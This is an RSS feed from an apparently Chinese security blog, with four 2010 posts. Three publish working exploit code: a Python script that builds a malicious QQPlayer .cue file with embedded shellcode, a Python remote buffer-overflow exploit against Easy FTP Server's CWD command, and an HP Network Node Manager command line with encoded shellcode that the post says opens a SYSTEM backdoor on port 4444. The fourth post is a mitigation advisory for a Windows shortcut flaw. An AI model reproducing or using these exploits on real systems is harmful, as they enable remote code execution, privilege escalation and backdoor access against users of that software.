<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>SpookZanG</title>
	<atom:link href="http://www.spookzang.net/feed" rel="self" type="application/rss+xml" />
	<link>http://www.spookzang.net</link>
	<description>安全,漏洞,发现,共享,交流</description>
	<lastBuildDate>Tue, 27 Jul 2010 15:28:29 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>QQPlayer cue 文件缓冲区溢出漏洞</title>
		<link>http://www.spookzang.net/article/1934</link>
		<comments>http://www.spookzang.net/article/1934#comments</comments>
		<pubDate>Tue, 27 Jul 2010 15:28:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[编程溢出]]></category>
		<category><![CDATA[溢出]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.spookzang.net/?p=1934</guid>
		<description><![CDATA[QQPlayer cue 文件缓冲区溢出漏洞]]></description>
			<content:encoded><![CDATA[<p>QQPlayer cue 文件缓冲区溢出漏洞</p>
<p><a href="http://image.spookzang.net//2010/07/14431.png"><img class="alignnone size-full wp-image-1935" title="14431" src="http://image.spookzang.net//2010/07/14431.png" alt="" width="742" height="512" /></a></p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
</pre></td><td class="code"><pre class="python" style="font-family:monospace;">&nbsp;
<span style="color: #808080; font-style: italic;">#!/usr/bin/env python</span>
&nbsp;
<span style="color: #808080; font-style: italic;">#################################################################</span>
<span style="color: #808080; font-style: italic;">#</span>
<span style="color: #808080; font-style: italic;"># Title: QQPlayer cue File Buffer Overflow Exploit</span>
<span style="color: #808080; font-style: italic;"># Author: Lufeng Li of Neusoft Corporation</span>
<span style="color: #808080; font-style: italic;"># Vendor: www.qq.com</span>
<span style="color: #808080; font-style: italic;"># Platform: Windows XPSP3 Chinese Simplified</span>
<span style="color: #808080; font-style: italic;"># Tested: QQPlayer 2.3.696.400</span>
<span style="color: #808080; font-style: italic;"># Vulnerable: QQPlayer&lt;=2.3.696.400p1</span>
<span style="color: #808080; font-style: italic;">#</span>
<span style="color: #808080; font-style: italic;">#################################################################</span>
<span style="color: #808080; font-style: italic;"># Code :</span>
&nbsp;
head = <span style="color: #483d8b;">''</span><span style="color: #483d8b;">'FILE &quot;'</span><span style="color: #483d8b;">''</span>
junk = <span style="color: #483d8b;">&quot;A&quot;</span> <span style="color: #66cc66;">*</span> <span style="color: #ff4500;">780</span>
nseh =<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>42<span style="color: #000099; font-weight: bold;">\x</span>61<span style="color: #000099; font-weight: bold;">\x</span>21<span style="color: #000099; font-weight: bold;">\x</span>61&quot;</span>
seh  =<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>a9<span style="color: #000099; font-weight: bold;">\x</span>9e<span style="color: #000099; font-weight: bold;">\x</span>41<span style="color: #000099; font-weight: bold;">\x</span>00&quot;</span>
adjust=<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>32<span style="color: #000099; font-weight: bold;">\x</span>42<span style="color: #000099; font-weight: bold;">\x</span>61<span style="color: #000099; font-weight: bold;">\x</span>33<span style="color: #000099; font-weight: bold;">\x</span>ca<span style="color: #000099; font-weight: bold;">\x</span>83<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>10&quot;</span>
shellcode=<span style="color: black;">&#40;</span><span style="color: #483d8b;">&quot;hffffk4diFkTpj02Tpk0T0AuEE2C4s4o0t0w174t0c7L0T0V7L2z1l131o2q1k2D1l081o&quot;</span>
           <span style="color: #483d8b;">&quot;0v1o0a7O2r0T3w3e1P0a7o0a3Y3K0l3w038N5L0c5p8K354q2j8N5O00PYVTX10X41PZ41&quot;</span>
           <span style="color: #483d8b;">&quot;H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2C5CJO1E0G1I4T1R2M0T1V7L1TKL2CK&quot;</span>
           <span style="color: #483d8b;">&quot;NK0KN2EKL08KN1FKO1Q7LML2N3W46607K7N684H310I9W025DOL1S905A4D802Z5DOO01&quot;</span><span style="color: black;">&#41;</span>
junk_=<span style="color: #483d8b;">&quot;R&quot;</span><span style="color: #66cc66;">*</span><span style="color: #ff4500;">8000</span>
foot =<span style="color: #483d8b;">''</span><span style="color: #483d8b;">'.avi&quot; VIDEO'</span><span style="color: #483d8b;">''</span>+<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>0a&quot;</span><span style="color: #483d8b;">''</span><span style="color: #483d8b;">'TRACK 02 MODE1/8888'</span><span style="color: #483d8b;">''</span>+<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>0a&quot;</span>+<span style="color: #483d8b;">&quot;INDEX 08 08:08:08&quot;</span>
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot
&nbsp;
fobj = <span style="color: #008000;">open</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">&quot;poc.cue&quot;</span>,<span style="color: #483d8b;">&quot;w&quot;</span><span style="color: black;">&#41;</span>
fobj.<span style="color: black;">write</span><span style="color: black;">&#40;</span>payload<span style="color: black;">&#41;</span>
fobj.<span style="color: black;">close</span><span style="color: black;">&#40;</span><span style="color: black;">&#41;</span></pre></td></tr></table></div>

]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/1934/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>微软被曝快捷方式漏洞</title>
		<link>http://www.spookzang.net/article/1931</link>
		<comments>http://www.spookzang.net/article/1931#comments</comments>
		<pubDate>Thu, 22 Jul 2010 14:41:13 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[安全新闻]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[远程]]></category>

		<guid isPermaLink="false">http://www.spookzang.net/?p=1931</guid>
		<description><![CDATA[微软于近日发布公告，称其发现一个极其严重的漏洞，可作用于WINDOWS2000 - WINDOWS 7 之间。该漏洞存在于“Windows Shell”组件中，当用户运行黑客们构造的“特殊”的快捷方式时候，就会远程执行黑客所想执行的命令。]]></description>
			<content:encoded><![CDATA[<p>微软于近日发布公告，称其发现一个极其严重的漏洞，可作用于WINDOWS2000 &#8211; WINDOWS 7 之间。该漏洞存在于“Windows Shell”组件中，当用户运行黑客们构造的“特殊”的快捷方式时候，就会远程执行黑客所想执行的命令。</p>
<p>微软推出了临时解决的方法，但尚未发布补丁。</p>
<p>临时解决方法：关闭系统WebClient服务</p>
<p>1.在开始－－运行中输入“Services.msc”，打开服务控制面板。</p>
<p>2.找到“WebClient”服务项，如果其正在运行状态中，请先将其关闭，之后修改启动类型为“已禁用”。</p>
<p><span style="color: #ff0000;"><strong>此方案所带来的影响：WebDAV请求将不会被传输，另外任何明显依赖于“WebClient”服务的其它服务项会受到影响。</strong></span></p>
<p>或者：</p>
<p>1.打开注册表编辑器，定位到“HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler”项目下</p>
<p>2.右键单击，选择导出，将该项注册表键值进行修改前备份。</p>
<p>3.备份之后，将该项的默认键值修改为空。</p>
<p><span style="color: #ff0000;"><strong>此方案所带来的影响：快捷方式的图标将不会被显示，而是呈现出“未知文件类型”的图标样式。这仅仅是视觉效果上的影响。</strong></span></p>
<p><span style="color: #ff0000;"><strong>请各位用户谨慎决定！！！</strong></span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/1931/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Easy FTP Server v1.7.0.11 远程缓冲区溢出漏洞</title>
		<link>http://www.spookzang.net/article/1927</link>
		<comments>http://www.spookzang.net/article/1927#comments</comments>
		<pubDate>Mon, 19 Jul 2010 08:48:03 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[入侵渗透]]></category>
		<category><![CDATA[编程溢出]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[提权]]></category>
		<category><![CDATA[溢出]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.spookzang.net/?p=1927</guid>
		<description><![CDATA[Easy FTP Server v1.7.0.11 远程缓冲区溢出漏洞，以及0day程序。]]></description>
			<content:encoded><![CDATA[<p>Easy FTP Server v1.7.0.11 远程缓冲区溢出漏洞，以及0day程序。</p>
<p><a href='http://image.spookzang.net//2010/07/14402.zip'>漏洞利用程序下载</a></p>
<p><a href="http://image.spookzang.net//2010/07/14402.png"><img src="http://image.spookzang.net//2010/07/14402.png" alt="" title="14402" width="1115" height="898" class="alignnone size-full wp-image-1928" /></a></p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
</pre></td><td class="code"><pre class="python" style="font-family:monospace;"><span style="color: #808080; font-style: italic;"># Exploit Title: Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit (Post Auth)</span>
<span style="color: #808080; font-style: italic;"># Date: 2010-07-18</span>
<span style="color: #808080; font-style: italic;"># Author: fdisk</span>
<span style="color: #808080; font-style: italic;"># Software Link:</span>
<span style="color: #808080; font-style: italic;"># Version: 1.7.0.11</span>
<span style="color: #808080; font-style: italic;"># Tested on: Windows XP SP3 en</span>
<span style="color: #808080; font-style: italic;"># CVE:</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">socket</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">sys</span>
&nbsp;
buffersize = <span style="color: #ff4500;">268</span>
&nbsp;
<span style="color: #808080; font-style: italic;"># windows/exec - 227 bytes x86/shikata_ga_nai EXITFUNC=process, CMD=calc.exe</span>
shellcode = <span style="color: black;">&#40;</span><span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>b8<span style="color: #000099; font-weight: bold;">\x</span>f1<span style="color: #000099; font-weight: bold;">\x</span>18<span style="color: #000099; font-weight: bold;">\x</span>c7<span style="color: #000099; font-weight: bold;">\x</span>71<span style="color: #000099; font-weight: bold;">\x</span>d9<span style="color: #000099; font-weight: bold;">\x</span>c7<span style="color: #000099; font-weight: bold;">\x</span>29<span style="color: #000099; font-weight: bold;">\x</span>c9<span style="color: #000099; font-weight: bold;">\x</span>b1<span style="color: #000099; font-weight: bold;">\x</span>33<span style="color: #000099; font-weight: bold;">\x</span>d9<span style="color: #000099; font-weight: bold;">\x</span>74<span style="color: #000099; font-weight: bold;">\x</span>24<span style="color: #000099; font-weight: bold;">\x</span>f4&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>5b<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>43<span style="color: #000099; font-weight: bold;">\x</span>12<span style="color: #000099; font-weight: bold;">\x</span>83<span style="color: #000099; font-weight: bold;">\x</span>eb<span style="color: #000099; font-weight: bold;">\x</span>fc<span style="color: #000099; font-weight: bold;">\x</span>03<span style="color: #000099; font-weight: bold;">\x</span>b2<span style="color: #000099; font-weight: bold;">\x</span>16<span style="color: #000099; font-weight: bold;">\x</span>25<span style="color: #000099; font-weight: bold;">\x</span>84<span style="color: #000099; font-weight: bold;">\x</span>c8<span style="color: #000099; font-weight: bold;">\x</span>cf<span style="color: #000099; font-weight: bold;">\x</span>20&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>67<span style="color: #000099; font-weight: bold;">\x</span>30<span style="color: #000099; font-weight: bold;">\x</span>10<span style="color: #000099; font-weight: bold;">\x</span>53<span style="color: #000099; font-weight: bold;">\x</span>e1<span style="color: #000099; font-weight: bold;">\x</span>d5<span style="color: #000099; font-weight: bold;">\x</span>21<span style="color: #000099; font-weight: bold;">\x</span>41<span style="color: #000099; font-weight: bold;">\x</span>95<span style="color: #000099; font-weight: bold;">\x</span>9e<span style="color: #000099; font-weight: bold;">\x</span>10<span style="color: #000099; font-weight: bold;">\x</span>55<span style="color: #000099; font-weight: bold;">\x</span>dd<span style="color: #000099; font-weight: bold;">\x</span>f2<span style="color: #000099; font-weight: bold;">\x</span>98&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>1e<span style="color: #000099; font-weight: bold;">\x</span>b3<span style="color: #000099; font-weight: bold;">\x</span>e6<span style="color: #000099; font-weight: bold;">\x</span>2b<span style="color: #000099; font-weight: bold;">\x</span>52<span style="color: #000099; font-weight: bold;">\x</span>1c<span style="color: #000099; font-weight: bold;">\x</span>09<span style="color: #000099; font-weight: bold;">\x</span>9b<span style="color: #000099; font-weight: bold;">\x</span>d9<span style="color: #000099; font-weight: bold;">\x</span>7a<span style="color: #000099; font-weight: bold;">\x</span>24<span style="color: #000099; font-weight: bold;">\x</span>1c<span style="color: #000099; font-weight: bold;">\x</span>ec<span style="color: #000099; font-weight: bold;">\x</span>42<span style="color: #000099; font-weight: bold;">\x</span>ea&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>de<span style="color: #000099; font-weight: bold;">\x</span>6e<span style="color: #000099; font-weight: bold;">\x</span>3f<span style="color: #000099; font-weight: bold;">\x</span>f0<span style="color: #000099; font-weight: bold;">\x</span>32<span style="color: #000099; font-weight: bold;">\x</span>51<span style="color: #000099; font-weight: bold;">\x</span>7e<span style="color: #000099; font-weight: bold;">\x</span>3b<span style="color: #000099; font-weight: bold;">\x</span>47<span style="color: #000099; font-weight: bold;">\x</span>90<span style="color: #000099; font-weight: bold;">\x</span>47<span style="color: #000099; font-weight: bold;">\x</span>21<span style="color: #000099; font-weight: bold;">\x</span>a8<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>10&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>2e<span style="color: #000099; font-weight: bold;">\x</span>1b<span style="color: #000099; font-weight: bold;">\x</span>f5<span style="color: #000099; font-weight: bold;">\x</span>15<span style="color: #000099; font-weight: bold;">\x</span>72<span style="color: #000099; font-weight: bold;">\x</span>a0<span style="color: #000099; font-weight: bold;">\x</span>f4<span style="color: #000099; font-weight: bold;">\x</span>f9<span style="color: #000099; font-weight: bold;">\x</span>f9<span style="color: #000099; font-weight: bold;">\x</span>98<span style="color: #000099; font-weight: bold;">\x</span>8e<span style="color: #000099; font-weight: bold;">\x</span>7c<span style="color: #000099; font-weight: bold;">\x</span>3d<span style="color: #000099; font-weight: bold;">\x</span>6c<span style="color: #000099; font-weight: bold;">\x</span>25&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>7e<span style="color: #000099; font-weight: bold;">\x</span>6d<span style="color: #000099; font-weight: bold;">\x</span>dd<span style="color: #000099; font-weight: bold;">\x</span>32<span style="color: #000099; font-weight: bold;">\x</span>c8<span style="color: #000099; font-weight: bold;">\x</span>95<span style="color: #000099; font-weight: bold;">\x</span>55<span style="color: #000099; font-weight: bold;">\x</span>1c<span style="color: #000099; font-weight: bold;">\x</span>e9<span style="color: #000099; font-weight: bold;">\x</span>a4<span style="color: #000099; font-weight: bold;">\x</span>ba<span style="color: #000099; font-weight: bold;">\x</span>7e<span style="color: #000099; font-weight: bold;">\x</span>d5<span style="color: #000099; font-weight: bold;">\x</span>ef<span style="color: #000099; font-weight: bold;">\x</span>b7&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>b5<span style="color: #000099; font-weight: bold;">\x</span>ad<span style="color: #000099; font-weight: bold;">\x</span>ee<span style="color: #000099; font-weight: bold;">\x</span>11<span style="color: #000099; font-weight: bold;">\x</span>84<span style="color: #000099; font-weight: bold;">\x</span>4e<span style="color: #000099; font-weight: bold;">\x</span>c1<span style="color: #000099; font-weight: bold;">\x</span>5d<span style="color: #000099; font-weight: bold;">\x</span>4b<span style="color: #000099; font-weight: bold;">\x</span>71<span style="color: #000099; font-weight: bold;">\x</span>ee<span style="color: #000099; font-weight: bold;">\x</span>53<span style="color: #000099; font-weight: bold;">\x</span>95<span style="color: #000099; font-weight: bold;">\x</span>b5<span style="color: #000099; font-weight: bold;">\x</span>c8&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>8b<span style="color: #000099; font-weight: bold;">\x</span>e0<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>2b<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>f3<span style="color: #000099; font-weight: bold;">\x</span>15<span style="color: #000099; font-weight: bold;">\x</span>56<span style="color: #000099; font-weight: bold;">\x</span>ed<span style="color: #000099; font-weight: bold;">\x</span>76<span style="color: #000099; font-weight: bold;">\x</span>88<span style="color: #000099; font-weight: bold;">\x</span>f0<span style="color: #000099; font-weight: bold;">\x</span>66<span style="color: #000099; font-weight: bold;">\x</span>20<span style="color: #000099; font-weight: bold;">\x</span>68&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>01<span style="color: #000099; font-weight: bold;">\x</span>aa<span style="color: #000099; font-weight: bold;">\x</span>b7<span style="color: #000099; font-weight: bold;">\x</span>fb<span style="color: #000099; font-weight: bold;">\x</span>0d<span style="color: #000099; font-weight: bold;">\x</span>07<span style="color: #000099; font-weight: bold;">\x</span>b3<span style="color: #000099; font-weight: bold;">\x</span>a4<span style="color: #000099; font-weight: bold;">\x</span>11<span style="color: #000099; font-weight: bold;">\x</span>96<span style="color: #000099; font-weight: bold;">\x</span>10<span style="color: #000099; font-weight: bold;">\x</span>df<span style="color: #000099; font-weight: bold;">\x</span>2d<span style="color: #000099; font-weight: bold;">\x</span>13<span style="color: #000099; font-weight: bold;">\x</span>97&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>30<span style="color: #000099; font-weight: bold;">\x</span>a4<span style="color: #000099; font-weight: bold;">\x</span>67<span style="color: #000099; font-weight: bold;">\x</span>bc<span style="color: #000099; font-weight: bold;">\x</span>94<span style="color: #000099; font-weight: bold;">\x</span>ed<span style="color: #000099; font-weight: bold;">\x</span>3c<span style="color: #000099; font-weight: bold;">\x</span>dd<span style="color: #000099; font-weight: bold;">\x</span>8d<span style="color: #000099; font-weight: bold;">\x</span>4b<span style="color: #000099; font-weight: bold;">\x</span>92<span style="color: #000099; font-weight: bold;">\x</span>e2<span style="color: #000099; font-weight: bold;">\x</span>ce<span style="color: #000099; font-weight: bold;">\x</span>33<span style="color: #000099; font-weight: bold;">\x</span>4b&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>47<span style="color: #000099; font-weight: bold;">\x</span>84<span style="color: #000099; font-weight: bold;">\x</span>d1<span style="color: #000099; font-weight: bold;">\x</span>98<span style="color: #000099; font-weight: bold;">\x</span>f1<span style="color: #000099; font-weight: bold;">\x</span>c7<span style="color: #000099; font-weight: bold;">\x</span>bf<span style="color: #000099; font-weight: bold;">\x</span>5f<span style="color: #000099; font-weight: bold;">\x</span>73<span style="color: #000099; font-weight: bold;">\x</span>72<span style="color: #000099; font-weight: bold;">\x</span>86<span style="color: #000099; font-weight: bold;">\x</span>60<span style="color: #000099; font-weight: bold;">\x</span>8b<span style="color: #000099; font-weight: bold;">\x</span>7d<span style="color: #000099; font-weight: bold;">\x</span>a8&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>08<span style="color: #000099; font-weight: bold;">\x</span>ba<span style="color: #000099; font-weight: bold;">\x</span>f6<span style="color: #000099; font-weight: bold;">\x</span>27<span style="color: #000099; font-weight: bold;">\x</span>4e<span style="color: #000099; font-weight: bold;">\x</span>43<span style="color: #000099; font-weight: bold;">\x</span>dd<span style="color: #000099; font-weight: bold;">\x</span>0c<span style="color: #000099; font-weight: bold;">\x</span>a0<span style="color: #000099; font-weight: bold;">\x</span>09<span style="color: #000099; font-weight: bold;">\x</span>7c<span style="color: #000099; font-weight: bold;">\x</span>24<span style="color: #000099; font-weight: bold;">\x</span>29<span style="color: #000099; font-weight: bold;">\x</span>d4<span style="color: #000099; font-weight: bold;">\x</span>14&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>75<span style="color: #000099; font-weight: bold;">\x</span>34<span style="color: #000099; font-weight: bold;">\x</span>e7<span style="color: #000099; font-weight: bold;">\x</span>c2<span style="color: #000099; font-weight: bold;">\x</span>b9<span style="color: #000099; font-weight: bold;">\x</span>41<span style="color: #000099; font-weight: bold;">\x</span>64<span style="color: #000099; font-weight: bold;">\x</span>e7<span style="color: #000099; font-weight: bold;">\x</span>41<span style="color: #000099; font-weight: bold;">\x</span>b6<span style="color: #000099; font-weight: bold;">\x</span>74<span style="color: #000099; font-weight: bold;">\x</span>82<span style="color: #000099; font-weight: bold;">\x</span>44<span style="color: #000099; font-weight: bold;">\x</span>f2<span style="color: #000099; font-weight: bold;">\x</span>32&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>7e<span style="color: #000099; font-weight: bold;">\x</span>34<span style="color: #000099; font-weight: bold;">\x</span>6b<span style="color: #000099; font-weight: bold;">\x</span>d7<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>eb<span style="color: #000099; font-weight: bold;">\x</span>8c<span style="color: #000099; font-weight: bold;">\x</span>f2<span style="color: #000099; font-weight: bold;">\x</span>e2<span style="color: #000099; font-weight: bold;">\x</span>6a<span style="color: #000099; font-weight: bold;">\x</span>1f<span style="color: #000099; font-weight: bold;">\x</span>9e<span style="color: #000099; font-weight: bold;">\x</span>ca<span style="color: #000099; font-weight: bold;">\x</span>09<span style="color: #000099; font-weight: bold;">\x</span>a7&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>05<span style="color: #000099; font-weight: bold;">\x</span>13&quot;</span><span style="color: black;">&#41;</span>
&nbsp;
eip = <span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>91<span style="color: #000099; font-weight: bold;">\x</span>C8<span style="color: #000099; font-weight: bold;">\x</span>41<span style="color: #000099; font-weight: bold;">\x</span>7E&quot;</span> <span style="color: #808080; font-style: italic;"># CALL EDI - user32.dll</span>
nopsled = <span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>90&quot;</span> <span style="color: #66cc66;">*</span> <span style="color: #ff4500;">16</span>
&nbsp;
payload = <span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>90&quot;</span> <span style="color: #66cc66;">*</span> <span style="color: black;">&#40;</span>buffersize-<span style="color: black;">&#40;</span><span style="color: #008000;">len</span><span style="color: black;">&#40;</span>nopsled<span style="color: black;">&#41;</span>+<span style="color: #008000;">len</span><span style="color: black;">&#40;</span>shellcode<span style="color: black;">&#41;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">def</span> ExploitEasyFTP<span style="color: black;">&#40;</span>target<span style="color: black;">&#41;</span>:
    s = <span style="color: #dc143c;">socket</span>.<span style="color: #dc143c;">socket</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">socket</span>.<span style="color: black;">AF_INET</span>, <span style="color: #dc143c;">socket</span>.<span style="color: black;">SOCK_STREAM</span><span style="color: black;">&#41;</span>
    connect = s.<span style="color: black;">connect</span><span style="color: black;">&#40;</span><span style="color: black;">&#40;</span>target, <span style="color: #ff4500;">21</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span>
    s.<span style="color: black;">recv</span><span style="color: black;">&#40;</span><span style="color: #ff4500;">1024</span><span style="color: black;">&#41;</span>
    s.<span style="color: black;">send</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">'User anonymous<span style="color: #000099; font-weight: bold;">\r</span><span style="color: #000099; font-weight: bold;">\n</span>'</span><span style="color: black;">&#41;</span>
    s.<span style="color: black;">recv</span><span style="color: black;">&#40;</span><span style="color: #ff4500;">1024</span><span style="color: black;">&#41;</span>
    s.<span style="color: black;">send</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">'PASS anonymous<span style="color: #000099; font-weight: bold;">\r</span><span style="color: #000099; font-weight: bold;">\n</span>'</span><span style="color: black;">&#41;</span>
    s.<span style="color: black;">send</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">'CWD '</span>+nopsled+shellcode+payload+eip+<span style="color: #483d8b;">'<span style="color: #000099; font-weight: bold;">\r</span><span style="color: #000099; font-weight: bold;">\n</span>'</span><span style="color: black;">&#41;</span>
    s.<span style="color: black;">recv</span><span style="color: black;">&#40;</span><span style="color: #ff4500;">1024</span><span style="color: black;">&#41;</span>
    s.<span style="color: black;">send</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">'QUIT ftp<span style="color: #000099; font-weight: bold;">\r</span><span style="color: #000099; font-weight: bold;">\n</span>'</span><span style="color: black;">&#41;</span>
    s.<span style="color: black;">close</span><span style="color: black;">&#40;</span><span style="color: black;">&#41;</span>
&nbsp;
target = <span style="color: #dc143c;">sys</span>.<span style="color: black;">argv</span><span style="color: black;">&#91;</span><span style="color: #ff4500;">1</span><span style="color: black;">&#93;</span>
&nbsp;
ExploitEasyFTP<span style="color: black;">&#40;</span>target<span style="color: black;">&#41;</span></pre></td></tr></table></div>

]]></content:encoded>
			<wfw:commentRss>http://www.spookzang.net/article/1927/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>惠普 Network Node Manager 7.53 缓冲区溢出漏洞+0day</title>
		<link>http://www.spookzang.net/article/1923</link>
		<comments>http://www.spookzang.net/article/1923#comments</comments>
		<pubDate>Fri, 16 Jul 2010 04:20:19 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[入侵渗透]]></category>
		<category><![CDATA[编程溢出]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[溢出]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.spookzang.net/?p=1923</guid>
		<description><![CDATA[HP Network Node Manager (NNM) 7.53缓冲区溢出漏洞+0day。在运行这个0day之后就能获得一个端口为4444的system后门，这个漏洞可以用来提权，使得可以用user权限轻松获得system权限！]]></description>
			<content:encoded><![CDATA[<p>HP Network Node Manager (NNM) 7.53缓冲区溢出漏洞+0day。</p>
<p><a href="http://image.spookzang.net//2010/07/14256.png"><img src="http://image.spookzang.net//2010/07/14256.png" alt="" title="14256" width="800" height="600" class="alignnone size-full wp-image-1924" /></a></p>
<p>如图运行下面语句即可打开一个端口为4444的后门。</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="language" style="font-family:monospace;">C:\Program Files\HP OpenView\www\bin\ovwebsnmpsrv.exe -dump AAAAAAAAAAAAUXf-9Tf-9Tf-9TU\AAAAAAAAAAAAAAAAAAAAAPYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxMYC0EPGpCPNiJEP1KbQtLKPRFPLKF2DLNkF2EDNkD2ExFoMgPJDfDqIoEaIPNLElPaQlFbDlGPJaHODMFaIWKRL0QBF7LKBrFpLKQRElFaJpNkQPD8OuIPCDCzEQHPF0LKQXGhNkBxEpEQHSKSElQYLKDtLKFaKfP1KOP1KpLlIQJoDMGqO7DxM0BUJTFcCMIhGKQmQ4CEKRBxLKBxQ4FaN3E6NkDLPKLKBxELEQJsLKC4NkC1HPMYG4GTQ4QKQKCQPYQJCaKOIpBxQOCjLKDRHkMVCmE8GCFRGpC0E8BWCCP2CoPTPhPLQgFFDGIoJuOHNpEQGpGpQ9HDPTBpBHFIMPPkGpIoKePPPPPPBpG0F0G0F0QxJJDOKoM0KOHULIO7DqIKQCE8C2GpFqQLK9HfPjDPCfCgPhIRIKEgE7KOIEBsBwBHH7KYDxKOIoJuQCCcF7PhQdJLEkKQKON5QGOyIWE8QeBNPMQqKON5BHQsBME4C0NiJCBwBwQGP1L6PjGbPYCfKRImBFO7G4FDGLC1FaNmPDGTFpKvGpG4QDPPCfQFF6CvBvBnBvF6QCQFBHQiJlEoNfKOJuK9IpBnF6CvIoP0BHDHOwGmCPKOHUMkJPH5MrF6BHMvJ5MmOmKOJuElDFCLFjOpKKM0BUEUOKG7GcQbBOCZC0CcKON5DJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA